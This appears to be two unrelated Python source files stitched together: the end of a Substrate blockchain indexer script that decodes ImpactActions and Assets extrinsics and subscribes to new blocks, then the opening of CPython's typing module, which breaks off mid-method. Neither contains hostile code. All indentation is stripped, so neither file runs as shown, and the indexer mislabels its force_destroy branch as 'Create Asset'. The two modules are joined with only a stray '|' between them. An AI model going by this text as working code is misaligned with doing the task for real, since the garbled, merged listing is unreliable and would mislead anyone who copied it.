print(extrinsic.params[0].get('value'))
c=extrinsic.params[0].get('value')
# new impact action
if c['call_module']== 'ImpactActions' and c['call_function']=='create_impact_action':
print("Impact Actions - Create New Impact Action")
print("id: ",c['call_args'][0]['value'])
print("data: ",c['call_args'][1]['value'])
impactactions_newimpactaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy impact action
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_impact_action':
print("Impact Actions - Destroy Impact Action")
print("id: ",c['call_args'][0]['value'])
impactactions_destroyimpactaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# new oracle
if c['call_module']== 'ImpactActions' and c['call_function']=='create_oracle':
print("Impact Actions - Create New Oracle")
print("id: ",c['call_args'][0]['value'])
print("data: ",c['call_args'][1]['value'])
impactactions_neworacle(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy oracle
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_oracle':
print("Impact Actions - Destroy Oracle")
print("id: ",c['call_args'][0]['value'])
impactactions_destroyoracle(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# new auditor
if c['call_module']== 'ImpactActions' and c['call_function']=='create_auditor':
print("Impact Actions - Create New Auditor")
print("id: ",c['call_args'][0]['value'])
print("data: ",c['call_args'][1]['value'])
impactactions_newauditor(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy auditor
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_auditor':
print("Impact Actions - Destroy Auditor")
print("id: ",c['call_args'][0]['value'])
impactactions_destroyauditor(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# new proxy account
if c['call_module']== 'ImpactActions' and c['call_function']=='create_proxy':
print("Impact Actions - Create New Proxy")
print("id: ",c['call_args'][0]['value'])
print("account: ",c['call_args'][1]['value'])
impactactions_newproxy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy proxy
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_proxy':
print("Impact Actions - Destroy Proxy")
print("id: ",c['call_args'][0]['value'])
impactactions_destroyproxy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# new category
if c['call_module']== 'ImpactActions' and c['call_function']=='create_category':
print("Impact Actions - Create New Category")
print("id: ",c['call_args'][0]['value'])
print("description: ",c['call_args'][1]['value'])
impactactions_newcategory(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy category
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_category':
print("Impact Actions - Destroy Category")
print("id: ",c['call_args'][0]['value'])
impactactions_destroycategory(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# Force Create Asset
if c['call_module']== 'Assets' and c['call_function']=='force_create':
print("Fungibile Tokens - Create Asset")
print("id: ",c['call_args'][0]['value'])
print("Owner: ",c['call_args'][1]['value'])
print("Max Zombies: ",c['call_args'][2]['value'])
print("Minimum Deposit: ",c['call_args'][3]['value'])
assets_force_create(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'],c['call_args'][2]['value'],c['call_args'][3]['value'])
# Force transfer Assets
if c['call_module']== 'Assets' and c['call_function']=='force_transfer':
print("Fungible Tokens - Force Transfer")
print("id: ",c['call_args'][0]['value'])
print("Witnesses Zombies: ",c['call_args'][1]['value'])
assets_forcetransfer(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,c['call_args'][1]['value'],currentime,c['call_args'][0]['value'],c['call_args'][2]['value'],c['call_args'][3]['value'])
# Force Destroy Asset
if c['call_module']== 'Assets' and c['call_function']=='force_destroy':
print("Fungible Tokens - Create Asset")
print("id: ",c['call_args'][0]['value'])
print("Witnesses Zombies: ",c['call_args'][1]['value'])
assets_force_destroy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# Loop through call params
for param in extrinsic.params:
if param['type'] == 'Compact<Balance>':
param['value'] = '{} {}'.format(param['value'] / 10 ** substrate.token_decimals, substrate.token_symbol)
print("Param '{}': {}".format(param['name'], param['value']))
cnt=cnt+1
# subscription handler for new blocks written
def subscription_handler(obj, update_nr, subscription_id):
print(f"New block #{obj['header']['number']} produced by {obj['author']} hash: {obj['header']['hash']}")
# call the block management function
process_block(obj['header']['number'])
## MAIN
# load custom data types
custom_type_registry = load_type_registry_file("../assets/types.json")
# define connection parameters
substrate = SubstrateInterface(
url=NODE,
ss58_format=42,
type_registry_preset='default',
type_registry=custom_type_registry
)
# create database tables
create_tables()
# syncronise the blockchain
if(len(sys.argv)>1):
if (sys.argv[1]== '--sync' or sys.argv[1]=="-s"):
sync_blockchain(substrate)
# subscribe to new block writing and process them in real time
result = substrate.subscribe_block_headers(subscription_handler, include_author=True)
print(result)
|
"""
The typing module: Support for gradual typing as defined by PEP 484.
At large scale, the structure of the module is following:
* Imports and exports, all public names should be explicitly added to __all__.
* Internal helper functions: these should never be used in code outside this module.
* _SpecialForm and its instances (special forms):
Any, NoReturn, ClassVar, Union, Optional, Concatenate
* Classes whose instances can be type arguments in addition to types:
ForwardRef, TypeVar and ParamSpec
* The core of internal generics API: _GenericAlias and _VariadicGenericAlias, the latter is
currently only used by Tuple and Callable. All subscripted types like X[int], Union[int, str],
etc., are instances of either of these classes.
* The public counterpart of the generics API consists of two classes: Generic and Protocol.
* Public helper functions: get_type_hints, overload, cast, no_type_check,
no_type_check_decorator.
* Generic aliases for collections.abc ABCs and few additional protocols.
* Special types: NewType, NamedTuple, TypedDict.
* Wrapper submodules for re and io related types.
"""
from abc import abstractmethod, ABCMeta
import collections
import collections.abc
import contextlib
import functools
import operator
import re as stdlib_re # Avoid confusion with the re we export.
import sys
import types
import warnings
from types import WrapperDescriptorType, MethodWrapperType, MethodDescriptorType, GenericAlias
try:
from _typing import _idfunc
except ImportError:
def _idfunc(_, x):
return x
# Please keep __all__ alphabetized within each category.
__all__ = [
# Super-special typing primitives.
'Annotated',
'Any',
'Callable',
'ClassVar',
'Concatenate',
'Final',
'ForwardRef',
'Generic',
'Literal',
'Optional',
'ParamSpec',
'Protocol',
'Tuple',
'Type',
'TypeVar',
'Union',
# ABCs (from collections.abc).
'AbstractSet', # collections.abc.Set.
'ByteString',
'Container',
'ContextManager',
'Hashable',
'ItemsView',
'Iterable',
'Iterator',
'KeysView',
'Mapping',
'MappingView',
'MutableMapping',
'MutableSequence',
'MutableSet',
'Sequence',
'Sized',
'ValuesView',
'Awaitable',
'AsyncIterator',
'AsyncIterable',
'Coroutine',
'Collection',
'AsyncGenerator',
'AsyncContextManager',
# Structural checks, a.k.a. protocols.
'Reversible',
'SupportsAbs',
'SupportsBytes',
'SupportsComplex',
'SupportsFloat',
'SupportsIndex',
'SupportsInt',
'SupportsRound',
# Concrete collection types.
'ChainMap',
'Counter',
'Deque',
'Dict',
'DefaultDict',
'List',
'OrderedDict',
'Set',
'FrozenSet',
'NamedTuple', # Not really a type.
'TypedDict', # Not really a type.
'Generator',
# Other concrete types.
'BinaryIO',
'IO',
'Match',
'Pattern',
'TextIO',
# One-off things.
'AnyStr',
'cast',
'final',
'get_args',
'get_origin',
'get_type_hints',
'is_typeddict',
'NewType',
'no_type_check',
'no_type_check_decorator',
'NoReturn',
'overload',
'ParamSpecArgs',
'ParamSpecKwargs',
'runtime_checkable',
'Text',
'TYPE_CHECKING',
'TypeAlias',
'TypeGuard',
]
# The pseudo-submodules 're' and 'io' are part of the public
# namespace, but excluded from __all__ because they might stomp on
# legitimate imports of those modules.
def _type_convert(arg, module=None):
"""For converting None to type(None), and strings to ForwardRef."""
if arg is None:
return type(None)
if isinstance(arg, str):
return ForwardRef(arg, module=module)
return arg
def _type_check(arg, msg, is_argument=True, module=None, *, is_class=False):
"""Check that the argument is a type, and return it (internal helper).
As a special case, accept None and return type(None) instead. Also wrap strings
into ForwardRef instances. Consider several corner cases, for example plain
special forms like Union are not valid, while Union[int, str] is OK, etc.
The msg argument is a human-readable error message, e.g::
"Union[arg, ...]: arg should be a type."
We append the repr() of the actual value (truncated to 100 chars).
"""
invalid_generic_forms = (Generic, Protocol)
if not is_class:
invalid_generic_forms += (ClassVar,)
if is_argument:
invalid_generic_forms += (Final,)
arg = _type_convert(arg, module=module)
if (isinstance(arg, _GenericAlias) and
arg.__origin__ in invalid_generic_forms):
raise TypeError(f"{arg} is not valid as type argument")
if arg in (Any, NoReturn, Final):
return arg
if isinstance(arg, _SpecialForm) or arg in (Generic, Protocol):
raise TypeError(f"Plain {arg} is not valid as type argument")
if isinstance(arg, (type, TypeVar, ForwardRef, types.UnionType, ParamSpec)):
return arg
if not callable(arg):
raise TypeError(f"{msg} Got {arg!r:.100}.")
return arg
def _is_param_expr(arg):
return arg is ... or isinstance(arg,
(tuple, list, ParamSpec, _ConcatenateGenericAlias))
def _type_repr(obj):
"""Return the repr() of an object, special-casing types (internal helper).
If obj is a type, we return a shorter version than the default
type.__repr__, based on the module and qualified name, which is
typically enough to uniquely identify a type. For everything
else, we fall back on repr(obj).
"""
if isinstance(obj, types.GenericAlias):
return repr(obj)
if isinstance(obj, type):
if obj.__module__ == 'builtins':
return obj.__qualname__
return f'{obj.__module__}.{obj.__qualname__}'
if obj is ...:
return('...')
if isinstance(obj, types.FunctionType):
return obj.__name__
return repr(obj)
def _collect_type_vars(types_, typevar_types=None):
"""Collect all type variable contained
in types in order of first appearance (lexicographic order). For example::
_collect_type_vars((T, List[S, T])) == (T, S)
"""
if typevar_types is None:
typevar_types = TypeVar
tvars = []
for t in types_:
if isinstance(t, typevar_types) and t not in tvars:
tvars.append(t)
if isinstance(t, (_GenericAlias, GenericAlias, types.UnionType)):
tvars.extend([t for t in t.__parameters__ if t not in tvars])
return tuple(tvars)
def _check_generic(cls, parameters, elen):
"""Check correct count for parameters of a generic cls (internal helper).
This gives a nice error message in case of count mismatch.
"""
if not elen:
raise TypeError(f"{cls} is not a generic class")
alen = len(parameters)
if alen != elen:
raise TypeError(f"Too {"many" if alen > elen else "few"} arguments for {cls};"
f" actual {alen}, expected {elen}")
def _prepare_paramspec_params(cls, params):
"""Prepares the parameters for a Generic containing ParamSpec
variables (internal helper).
"""
# Special case where Z[[int, str, bool]] == Z[int, str, bool] in PEP 612.
if (len(cls.__parameters__) == 1
and params and not _is_param_expr(params[0])):
assert isinstance(cls.__parameters__[0], ParamSpec)
return (params,)
else:
_check_generic(cls, params, len(cls.__parameters__))
_params = []
# Convert lists to tuples to help other libraries cache the results.
for p, tvar in zip(params, cls.__parameters__):
if isinstance(tvar, ParamSpec) and isinstance(p, list):
p = tuple(p)
_params.append(p)
return tuple(_params)
def _deduplicate(params):
# Weed out strict duplicates, preserving the first of each occurrence.
all_params = set(params)
if len(all_params) < len(params):
new_params = []
for t in params:
if t in all_params:
new_params.append(t)
all_params.remove(t)
params = new_params
assert not all_params, all_params
return params
def _remove_dups_flatten(parameters):
"""An internal helper for Union creation and substitution: flatten Unions
among parameters, then remove duplicates.
"""
# Flatten out Union[Union[...], ...].
params = []
for p in parameters:
if isinstance(p, (_UnionGenericAlias, types.UnionType)):
params.extend(p.__args__)
elif isinstance(p, tuple) and len(p) > 0 and p[0] is Union:
params.extend(p[1:])
else:
params.append(p)
return tuple(_deduplicate(params))
def _flatten_literal_params(parameters):
"""An internal helper for Literal creation: flatten Literals among parameters"""
params = []
for p in parameters:
if isinstance(p, _LiteralGenericAlias):
params.extend(p.__args__)
else:
params.append(p)
return tuple(params)
_cleanups = []
def _tp_cache(func=None, /, *, typed=False):
"""Internal wrapper caching __getitem__ of generic types with a fallback to
original function for non-hashable arguments.
"""
def decorator(func):
cached = functools.lru_cache(typed=typed)(func)
_cleanups.append(cached.cache_clear)
@functools.wraps(func)
def inner(*args, **kwds):
try:
return cached(*args, **kwds)
except TypeError:
pass # All real errors (not unhashable args) are raised below.
return func(*args, **kwds)
return inner
if func is not None:
return decorator(func)
return decorator
def _eval_type(t, globalns, localns, recursive_guard=frozenset()):
"""Evaluate all forward references in the given type t.
For use of globalns and localns see the docstring for get_type_hints().
recursive_guard is used to prevent prevent infinite recursion
with recursive ForwardRef.
"""
if isinstance(t, ForwardRef):
return t._evaluate(globalns, localns, recursive_guard)
if isinstance(t, (_GenericAlias, GenericAlias, types.UnionType)):
ev_args = tuple(_eval_type(a, globalns, localns, recursive_guard) for a in t.__args__)
if ev_args == t.__args__:
return t
if isinstance(t, GenericAlias):
return GenericAlias(t.__origin__, ev_args)
if isinstance(t, types.UnionType):
return functools.reduce(operator.or_, ev_args)
else:
return t.copy_with(ev_args)
return t
class _Final:
"""Mixin to prohibit subclassing"""
__slots__ = ('__weakref__',)
def __init_subclass__(self, /, *args, **kwds):
if '_root' not in kwds:
raise TypeError("Cannot subclass special typing classes")
class _Immutable:
"""Mixin to indicate that object should not be copied."""
__slots__ = ()
def __copy__(self):
return self
def __deepcopy__(self, memo):
return self
# Internal indicator of special typing constructs.
# See __doc__ instance attribute for specific docs.
class _SpecialForm(_Final, _root=True):
__slots__ = ('_name', '__doc__', '_getitem')
def __init__(self, getitem):
self._getitem = getitem
self._name = getitem.__name__
self.__doc__ = getitem.__doc__
def __getattr__(self, item):
if item in {'__name__', '__qualname__'}:
return self._name
raise AttributeError(item)
def __mro_entries__(self, bases):
raise TypeError(f"Cannot subclass {self!r}")
def __repr__(self):
return 'typing.' + self._name
def __reduce__(self):
return self._name
def __call__(self, *args, **kwds):
raise TypeError(f"Cannot instantiate {self!r}")
def __or__(self, other):
return Union[self, other]
def __ror__(self, other):
return Union[other, self]
def __instancecheck__(self, obj):
raise TypeError(f"{self} cannot be used with isinstance()")
def __subclasscheck__(self, cls):
raise TypeError(f"{self} cannot be used with issubclass()")
@_tp_cache
def __getitem__(self, parameters):
return self._getitem(self, parameters)
class _LiteralSpecialForm(_SpecialForm, _root=True):
def __getitem__(self, parameters):
if not isinstance(parameters, tuple):
parameters = (parameters,)
return self._getitem(self, *parameters)
@_SpecialForm
def Any(self, parameters):
"""Special type indicating an unconstrained type.
- Any is compatible with every type.
- Any assumed to have all methods.
- All values assumed to be instances of Any.
Note that all the above statements are true from the point of view of
static type checkers. At runtime, Any should not be used with instance
or class checks.
"""
raise TypeError(f"{self} is not subscriptable")
@_SpecialForm
def NoReturn(self, parameters):
"""Special type indicating functions that never return.
Example::
from typing import NoReturn
def stop() -> NoReturn:
raise Exception('no way')
This type is invalid in other positions, e.g., ``List[NoReturn]``
will fail in static type checkers.
"""
raise TypeError(f"{self} is not subscriptable")
@_SpecialForm
def ClassVar(self, parameters):
"""Special type construct to mark class variables.
An annotation wrapped in ClassVar indicates that a given
attribute is intended to be used as a class variable and
should not be set on instances of that class. Usage::
class Starship:
stats: ClassVar[Dict[str, int]] = {} # class variable
damage: int = 10 # instance variable
ClassVar accepts only types and cannot be further subscribed.
Note that ClassVar is not a class itself, and should not
be used with isinstance() or issubclass().
"""
item = _type_check(parameters, f'{self} accepts only single type.')
return _GenericAlias(self, (item,))
@_SpecialForm
def Final(self, parameters):
"""Special typing construct to indicate final names to type checkers.
A final name cannot be re-assigned or overridden in a subclass.
For example:
MAX_SIZE: Final = 9000
MAX_SIZE += 1 # Error reported by type checker
class Connection:
TIMEOUT: Final[int] = 10
class FastConnector(Connection):
TIMEOUT = 1 # Error reported by type checker
There is no runtime checking of these properties.
"""
item = _type_check(parameters, f'{self} accepts only single type.')
return _GenericAlias(self, (item,))
@_SpecialForm
def Union(self, parameters):
"""Union type; Union[X, Y] means either X or Y.
To define a union, use e.g. Union[int, str]. Details:
- The arguments must be types and there must be at least one.
- None as an argument is a special case and is replaced by
type(None).
- Unions of unions are flattened, e.g.::
Union[Union[int, str], float] == Union[int, str, float]
- Unions of a single argument vanish, e.g.::
Union[int] == int # The constructor actually returns int
- Redundant arguments are skipped, e.g.::
Union[int, str, int] == Union[int, str]
- When comparing unions, the argument order is ignored, e.g.::
Union[int, str] == Union[str, int]
- You cannot subclass or instantiate a union.
- You can use Optional[X] as a shorthand for Union[X, None].
"""
if parameters == ():
raise TypeError("Cannot take a Union of no types.")
if not isinstance(parameters, tuple):
parameters = (parameters,)
msg = "Union[arg, ...]: each arg must be a type."
parameters = tuple(_type_check(p, msg) for p in parameters)
parameters = _remove_dups_flatten(parameters)
if len(parameters) == 1:
return parameters[0]
if len(parameters) == 2 and type(None) in parameters:
return _UnionGenericAlias(self, parameters, name="Optional")
return _UnionGenericAlias(self, parameters)
@_SpecialForm
def Optional(self, parameters):
"""Optional type.
Optional[X] is equivalent to Union[X, None].
"""
arg = _type_check(parameters, f"{self} requires a single type.")
return Union[arg, type(None)]
@_LiteralSpecialForm
@_tp_cache(typed=True)
def Literal(self, *parameters):
"""Special typing form to define literal types (a.k.a. value types).
This form can be used to indicate to type checkers that the corresponding
variable or function parameter has a value equivalent to the provided
literal (or one of several literals):
def validate_simple(data: Any) -> Literal[True]: # always returns True
...
MODE = Literal['r', 'rb', 'w', 'wb']
def open_helper(file: str, mode: MODE) -> str:
...
open_helper('/some/path', 'r') # Passes type check
open_helper('/other/path', 'typo') # Error in type checker
Literal[...] cannot be subclassed. At runtime, an arbitrary value
is allowed as type argument to Literal[...], but type checkers may
impose restrictions.
"""
# There is no '_type_check' call because arguments to Literal[...] are
# values, not types.
parameters = _flatten_literal_params(parameters)
try:
parameters = tuple(p for p, _ in _deduplicate(list(_value_and_type_iter(parameters))))
except TypeError: # unhashable parameters
pass
return _LiteralGenericAlias(self, parameters)
@_SpecialForm
def TypeAlias(self, parameters):
"""Special marker indicating that an assignment should
be recognized as a proper type alias definition by type
checkers.
For example::
Predicate: TypeAlias = Callable[..., bool]
It's invalid when used anywhere except as in the example above.
"""
raise TypeError(f"{self} is not subscriptable")
@_SpecialForm
def Concatenate(self, parameters):
"""Used in conjunction with ``ParamSpec`` and ``Callable`` to represent a
higher order function which adds, removes or transforms parameters of a
callable.
For example::
Callable[Concatenate[int, P], int]
See PEP 612 for detailed information.
"""
if parameters == ():
raise TypeError("Cannot take a Concatenate of no types.")
if not isinstance(parameters, tuple):
parameters = (parameters,)
if not isinstance(parameters[-1], ParamSpec):
raise TypeError("The last parameter to Concatenate should be a "
"ParamSpec variable.")
msg = "Concatenate[arg, ...]: each arg must be a type."
parameters = tuple(_type_check(p, msg) for p in parameters)
return _ConcatenateGenericAlias(self, parameters)
@_SpecialForm
def TypeGuard(self, parameters):
"""Special typing form used to annotate the return type of a user-defined
type guard function. ``TypeGuard`` only accepts a single type argument.
At runtime, functions marked this way should return a boolean.
``TypeGuard`` aims to benefit *type narrowing* -- a technique used by static
type checkers to determine a more precise type of an expression within a
program's code flow. Usually type narrowing is done by analyzing
conditional code flow and applying the narrowing to a block of code. The
conditional expression here is sometimes referred to as a "type guard".
Sometimes it would be convenient to use a user-defined boolean function
as a type guard. Such a function should use ``TypeGuard[...]`` as its
return type to alert static type checkers to this intention.
Using ``-> TypeGuard`` tells the static type checker that for a given
function:
1. The return value is a boolean.
2. If the return value is ``True``, the type of its argument
is the type inside ``TypeGuard``.
For example::
def is_str(val: Union[str, float]):
# "isinstance" type guard
if isinstance(val, str):
# Type of ``val`` is narrowed to ``str``
...
else:
# Else, type of ``val`` is narrowed to ``float``.
...
Strict type narrowing is not enforced -- ``TypeB`` need not be a narrower
form of ``TypeA`` (it can even be a wider form) and this may lead to
type-unsafe results. The main reason is to allow for things like
narrowing ``List[object]`` to ``List[str]`` even though the latter is not
a subtype of the former, since ``List`` is invariant. The responsibility of
writing type-safe type guards is left to the user.
``TypeGuard`` also works with type variables. For more information, see
PEP 647 (User-Defined Type Guards).
"""
item = _type_check(parameters, f'{self} accepts only single type.')
return _GenericAlias(self, (item,))
class ForwardRef(_Final, _root=True):
"""Internal wrapper to hold a forward reference."""
__slots__ = ('__forward_arg__', '__forward_code__',
'__forward_evaluated__', '__forward_value__',
'__forward_is_argument__', '__forward_is_class__',
'__forward_module__')
def __init__(self, arg, is_argument=True, module=None, *, is_class=False):
if not isinstance(arg, str):
raise TypeError(f"Forward reference must be a string -- got {arg!r}")
try:
code = compile(arg, '<string>', 'eval')
except SyntaxError:
raise SyntaxError(f"Forward reference must be an expression -- got {arg!r}")
self.__forward_arg__ = arg
self.__forward_code__ = code
self.__forward_evaluated__ = False
self.__forward_value__ = None
self.__forward_is_argument__ = is_argument
self.__forward_is_class__ = is_class
self.__forward_module__ = module
def _evaluate(self, globalns, localns, recursive_guard):
if self.__forward_arg__ in recursive_guard:
return self
if not self.__forward_evaluated__ or localns is not globalns:
if globalns is None and localns is None:
globalns = localns = {}
elif globalns is None:
globalns = localns
elif localns is None:
localns = globalns
if self.__forward_module__ is not None:
globalns = getattr(
sys.modules.get(self.__forward_module__, None), '__dict__', globalns
)
type_ = _type_check(
eval(self.__forward_code__, globalns, localns),
"Forward references must evaluate to types.",
is_argument=self.__forward_is_argument__,
is_class=self.__forward_is_class__,
)
self.__forward_value__ = _eval_type(
type_, globalns, localns, recursive_guard | {self.__forward_arg__}
)
self.__forward_evaluated__ = True
return self.__forward_value__
def __eq__(self, other):
if not isinstance(other, ForwardRef):
return NotImplemented
if self.__forward_evaluated__ and other.__forward_evaluated__:
return (self.__forward_arg__ == other.__forward_arg__ and
self.__forward_value__ == other.__forward_value__)
return self.__forward_arg__ == other.__forward_arg__
def __hash__(self):
return hash(self.__forward_arg__)
def __or__(self, other):
return Union[self, other]
def __ror__(self, other):
return Union[other, self]
def __repr__(self):
return f'ForwardRef({self.__forward_arg__!r})'
class _TypeVarLike:
"""Mixin for TypeVar-like types (TypeVar and ParamSpec)."""
def __init__(self, bound, covariant, contravariant):
"""Used to setup TypeVars and ParamSpec's bound, covariant and
contravariant attributes.
"""
if covariant and contravariant:
raise ValueError("Bivariant types are not supported.")
self.__covariant__ = bool(covariant)
self.__contravariant__ = bool(contravariant)
if bound:
self.__bound__ = _type_check(bound, "Bound must be a type.")
else:
self.__bound__ = None
def __or__(self, right):
return Union[self, right]
def __ror__(self, left):
return Union[left, self]
def __repr__(self):
if self.__covariant__:
prefix = '+'
elif self.__contravariant__:
prefix = '-'
else:
prefix = '~'
return prefix + self.__name__
def __reduce__(self):
return self.__name__
class TypeVar( _Final, _Immutable, _TypeVarLike, _root=True):
"""Type variable.
Usage::
T = TypeVar('T') # Can be anything
A = TypeVar('A', str, bytes) # Must be str or bytes
Type variables exist primarily for the benefit of static type
checkers. They serve as the parameters for generic types as well
as for generic function definitions. See class Generic for more
information on generic types. Generic functions work as follows:
def repeat(x: T, n: int) -> List[T]:
'''Return a list containing n references to x.'''
return [x]*n
def longest(x: A, y: A) -> A:
'''Return the longest of two strings.'''
return x if len(x) >= len(y) else y
The latter example's signature is essentially the overloading
of (str, str) -> str and (bytes, bytes) -> bytes. Also note
that if the arguments are instances of some subclass of str,
the return type is still plain str.
At runtime, isinstance(x, T) and issubclass(C, T) will raise TypeError.
Type variables defined with covariant=True or contravariant=True
can be used to declare covariant or contravariant generic types.
See PEP 484 for more details. By default generic types are invariant
in all type variables.
Type variables can be introspected. e.g.:
T.__name__ == 'T'
T.__constraints__ == ()
T.__covariant__ == False
T.__contravariant__ = False
A.__constraints__ == (str, bytes)
Note that only type variables defined in global scope can be pickled.
"""
__slots__ = ('__name__', '__bound__', '__constraints__',
'__covariant__', '__contravariant__', '__dict__')
def __init__(self, name, *constraints, bound=None,
covariant=False, contravariant=False):
self.__name__ = name
super().__init__(bound, covariant, contravariant)
if constraints and bound is not None:
raise TypeError("Constraints cannot be combined with bound=...")
if constraints and len(constraints) == 1:
raise TypeError("A single constraint is not allowed")
msg = "TypeVar(name, constraint, ...): constraints must be types."
self.__constraints__ = tuple(_type_check(t, msg) for t in constraints)
def_mod = _caller()
if def_mod != 'typing':
self.__module__ = def_mod
class ParamSpecArgs(_Final, _Immutable, _root=True):
"""The args for a ParamSpec object.
Given a ParamSpec object P, P.args is an instance of ParamSpecArgs.
ParamSpecArgs objects have a reference back to their ParamSpec:
P.args.__origin__ is P
This type is meant for runtime introspection and has no special meaning to
static type checkers.
"""
def __init__(self, origin):
self.__origin__ = origin
def __repr__(self):
return f"{self.__origin__.__name__}.args"
class ParamSpecKwargs(_Final, _Immutable, _root=True):
"""The kwargs for a ParamSpec object.
Given a ParamSpec object P, P.kwargs is an instance of ParamSpecKwargs.
ParamSpecKwargs objects have a reference back to their ParamSpec:
P.kwargs.__origin__ is P
This type is meant for runtime introspection and has no special meaning to
static type checkers.
"""
def __init__(self, origin):
self.__origin__ = origin
def __repr__(self):
return f"{self.__origin__.__name__}.kwargs"
class ParamSpec(_Final, _Immutable, _TypeVarLike, _root=True):
"""Parameter specification variable.
Usage::
P = ParamSpec('P')
Parameter specification variables exist primarily for the benefit of static
type checkers. They are used to forward the parameter types of one
callable to another callable, a pattern commonly found in higher order
functions and decorators. They are only valid when used in ``Concatenate``,
or s the first argument to ``Callable``, or as parameters for user-defined
Generics. See class Generic for more information on generic types. An
example for annotating a decorator::
T = TypeVar('T')
P = ParamSpec('P')
def add_logging(f: Callable[P, T]) -> Callable[P, T]:
'''A type-safe decorator to add logging to a function.'''
def inner(*args: P.args, **kwargs: P.kwargs) -> T:
logging.info(f'{f.__name__} was called')
return f(*args, **kwargs)
return inner
@add_logging
def add_two(x: float, y: float) -> float:
'''Add two numbers together.'''
return x + y
Parameter specification variables defined with covariant=True or
contravariant=True can be used to declare covariant or contravariant
generic types. These keyword arguments are valid, but their actual semantics
are yet to be decided. See PEP 612 for details.
Parameter specification variables can be introspected. e.g.:
P.__name__ == 'T'
P.__bound__ == None
P.__covariant__ == False
P.__contravariant__ == False
Note that only parameter specification variables defined in global scope can
be pickled.
"""
__slots__ = ('__name__', '__bound__', '__covariant__', '__contravariant__',
'__dict__')
@property
def args(self):
return ParamSpecArgs(self)
@property
def kwargs(self):
return ParamSpecKwargs(self)
def __init__(self, name, *, bound=None, covariant=False, contravariant=False):
self.__name__ = name
super().__init__(bound, covariant, contravariant)
def_mod = _caller()
if def_mod != 'typing':
self.__module__ = def_mod
def _is_dunder(attr):
return attr.startswith('__') and attr.endswith('__')
class _BaseGenericAlias(_Final, _root=True):
"""The central part of internal API.
This represents a generic version of type 'origin' with type arguments 'params'.
There are two kind of these aliases: user defined and special. The special ones
are wrappers around builtin collections and ABCs in collections.abc. These must
have 'name' always set. If 'inst' is False, then the alias can't be instantiated,
this is used by e.g. typing.List and typing.Dict.
"""
def __init__(self, origin, *, inst=True, name=None):
self._inst = inst
self._name = name
self.__origin__ = origin
self.__slots__ = None # This is not documented.
def __call__(self, *args, **kwargs):
if not self._inst:
raise TypeError(f"Type {self._name} cannot be instantiated; "
f"use {self.__origin__.__name__}() instead")
result = self.__origin__(*args, **kwargs)
try:
result.__orig_class__ = self
except AttributeError:
pass
return result
def __mro_entries__(self, bases):
res = []
if self.__origin__ not in bases:
res.append(self.__origin__)
i = bases.index(self)
for b in bases[i+1:]:
if isinstance(b, _BaseGenericAlias) or issubclass(b, Generic):
break
else:
res.append(Generic)
return tuple(res)
def __getattr__(self, attr):
if attr in {'__name__', '__qualname__'}:
return self._name or self.__origin__.__name__
# We are careful for copy and pickle.
# Also for simplicity we just don't relay all dunder names
if '__origin__' in self.__dict__ and not _is_dunder(attr):
return getattr(self.__origin__, attr)
raise AttributeError(attr)
def __setattr__(self, attr, val):
if _is_dunder(attr) or attr in {'_name', '_inst', '_nparams',
'_typevar_types', '_paramspec_tvars'}:
super().__setattr__(attr, val)
else:
setattr(self.__origin__, attr, val)
def __instancecheck__(self, obj):
return self.__subclasscheck__(type(obj))
def __subclasscheck__(self, cls):
raise TypeError("Subscripted generics cannot be used with"
" class and instance checks")
# Special typing constructs Union, Optional, Generic, Callable and Tuple
# use three special attributes for internal bookkeeping of generic types:
# * __parameters__ is a tuple of unique free type parameters of a generic
# type, for example, Dict[T, T].__parameters__ == (T,);
# * __origin__ keeps a reference to a type that was subscripted,
# e.g., Union[T, int].__origin__ == Union, or the non-generic version of
# the type.
# * __args__ is a tuple of all arguments used in subscripting,
# e.g., Dict[T, int].__args__ == (T, int).
class _GenericAlias(_BaseGenericAlias, _root=True):
def __init__(self, origin, params, *, inst=True, name=None,
_typevar_types=TypeVar,
_paramspec_tvars=False):
super().__init__(origin, inst=inst, name=name)
if not isinstance(params, tuple):
params = (params,)
self.__args__ = tuple(... if a is _TypingEllipsis else
() if a is _TypingEmpty else
a for a in params)
self.__parameters__ = _collect_type_vars(params, typevar_types=_typevar_types)
self._typevar_types = _typevar_types
self._paramspec_tvars = _paramspec_tvars
if not name:
self.__module__ = origin.__module__
def __eq__(self, other):
if not isinstance(other, _GenericAlias):
return NotImplemented
return (self.__origin__ == other.__origin__
and self.__args__ == other.__args__)
def __hash__(self):
return hash((self.__origin__, self.__args__))
def __or__(self, right):
return Union[self, right]
def __ror__(self, left):
return Union[left, self]
@_tp_cache
def __getitem__(self, params):
if self.__origin__ in (Generic, Protocol):
# Can't subscript Generic[...] or Protocol[...].
raise TypeError(f"Cannot subscript already-subscripted {self}")
if not isinstance(params, tuple):
params = (params,)
params = tuple(_type_convert(p) for p in params)
if (self._paramspec_tvars
